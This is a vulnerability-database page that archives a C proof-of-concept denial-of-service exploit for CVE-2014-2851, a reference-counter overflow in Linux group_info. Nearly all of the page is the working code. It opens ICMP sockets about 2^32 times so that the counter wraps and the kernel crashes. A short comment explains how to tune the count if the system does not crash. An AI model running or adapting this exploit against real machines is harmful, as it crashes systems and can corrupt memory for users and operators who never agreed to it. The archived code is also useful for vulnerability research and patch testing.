Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2014-2851

Publish Date: 18 Apr 2014

Source

                							

                /*
 * DoS poc for CVE-2014-2851
 * Linux group_info refcounter overflow memory corruption
 *
 * https://lkml.org/lkml/2014/4/10/736
 *
 * @Tohmaxx - http://thomaspollet.blogspot.be
 *
 * If the app doesn't crash your system, try a different count (argv[1])
 * Execution takes a while because 2^32 socket() calls
 *
 */
 
#include &lt;arpa/inet.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/socket.h&gt;
int main(int argc, char *argv[]) {
    int i ;
    struct sockaddr_in saddr;
    unsigned count = (1UL&lt;&lt;32) - 20 ;
    if(argc &gt;= 2){
        // Specify count
        count = atoi(argv[1]);
    }
    printf("count 0x%x\n",count);
    for(i = 0 ; (unsigned)i &lt; count;i++ ){
        socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
        if ( i % ( 1 &lt;&lt; 22 ) == 0 )
            printf("%i \n",i);
    }
    //Now make it wrap and crash:
    system("/bin/echo bye bye");
}

<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Linux group_info Denial Of Service

Vulmon Search

About

Products

Connect